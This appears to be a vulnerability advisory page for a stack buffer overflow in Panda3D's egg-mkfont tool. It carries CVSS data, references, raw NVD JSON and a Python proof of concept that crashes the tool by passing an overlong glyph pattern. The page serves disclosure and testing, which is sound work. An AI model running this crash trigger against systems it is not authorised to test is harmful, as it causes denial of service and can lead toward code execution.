CVE-2026-22189

Description

Panda3D versions up to and including 1.10.16 egg-mkfont contains a stack-based buffer overflow vulnerability due to use of an unbounded sprintf() call with attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. Supplying an excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cmu:panda3d:*:*:*:*:*:*:*:* - VULNERABLE

Panda3D < 1.10.17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-22189 PoC - Panda3D egg-mkfont Stack Buffer Overflow
Note: This PoC is for educational and security research purposes only.
"""

import subprocess
import sys
import os

def generate_payload(length=2000):
    """Generate overflow payload - excessive glyph pattern string"""
    # Generate long string to overflow the stack buffer
    return "A" * length

def check_poc():
    """Check if vulnerable version of egg-mkfont exists"""
    # Common paths for egg-mkfont tool
    paths = [
        "/usr/bin/egg-mkfont",
        "/usr/local/bin/egg-mkfont",
        "./egg-mkfont",
        "/opt/panda3d/bin/egg-mkfont"
    ]
    
    for path in paths:
        if os.path.exists(path):
            return path
    return None

def main():
    print("[*] CVE-2026-22189 PoC - Panda3D egg-mkfont Stack Buffer Overflow")
    print("[*] CVSS Score: 9.8 (CRITICAL)")
    print()
    
    egg_mkfont_path = check_poc()
    if not egg_mkfont_path:
        print("[-] egg-mkfont tool not found. Please install Panda3D to test.")
        print("    Download: https://www.panda3d.org/")
        return
    
    print(f"[+] Found egg-mkfont at: {egg_mkfont_path}")
    print("[*] Generating payload with 2000 bytes...")
    
    payload = generate_payload(2000)
    
    # Construct the command to trigger overflow
    cmd = [egg_mkfont_path, "-gp", payload, "dummy_font.ttf"]
    
    print(f"[*] Executing: {' '.join(cmd)}")
    print("[*] This should cause a segmentation fault or crash...")
    print()
    
    try:
        # Execute and capture result
        result = subprocess.run(cmd, capture_output=True, timeout=5)
        print(f"[+] Exit code: {result.returncode}")
        print(f"[+] Stdout: {result.stdout.decode('utf-8', errors='ignore')}")
        if result.stderr:
            print(f"[+] Stderr: {result.stderr.decode('utf-8', errors='ignore')}")
    except subprocess.TimeoutExpired:
        print("[-] Process timed out")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22189
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22189
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22189/
[4] VulDB https://vuldb.com/cve/CVE-2026-22189
[5] https://github.com/panda3d/panda3d
[6] https://seclists.org/fulldisclosure/2026/Jan/10
[7] https://www.panda3d.org/
[8] https://www.vulncheck.com/advisories/panda3d-egg-mkfont-stack-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22189", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:16:03.067", "lastModified": "2026-01-12T17:59:18.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Panda3D versions up to and including 1.10.16 egg-mkfont contains a stack-based buffer overflow vulnerability due to use of an unbounded sprintf() call with attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. Supplying an excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution."}, {"lang": "es", "value": "Las versiones de Panda3D hasta la 1.10.16 inclusive, egg-mkfont contiene una vulnerabilidad de desbordamiento de búfer basado en pila debido al uso de una llamada sprintf() sin límites con entrada controlada por el atacante. Al construir nombres de archivo de glifos, egg-mkfont formatea un patrón de glifo proporcionado por el usuario (-gp) en un búfer de pila de tamaño fijo sin validación de longitud. Suministrar una cadena de patrón de glifo excesivamente larga puede desbordar el búfer de pila, lo que resulta en corrupción de memoria y un fallo determinista. Dependiendo de la configuración de compilación y el entorno de ejecución, el desbordamiento también puede ser explotable para ejecución de código arbitrario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmu:panda3d:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.10.16", "matchCriteriaId": "EBD14B18-5255-4C59-93D4-597FB077C187"}]}]}], "references": [{"url": "https://github.com/panda3d/panda3d", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://seclists.org/fulldisclosure/2026/Jan/10", "source": "[email protected]", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://www.panda3d.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/panda3d-egg-mkfont-stack-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}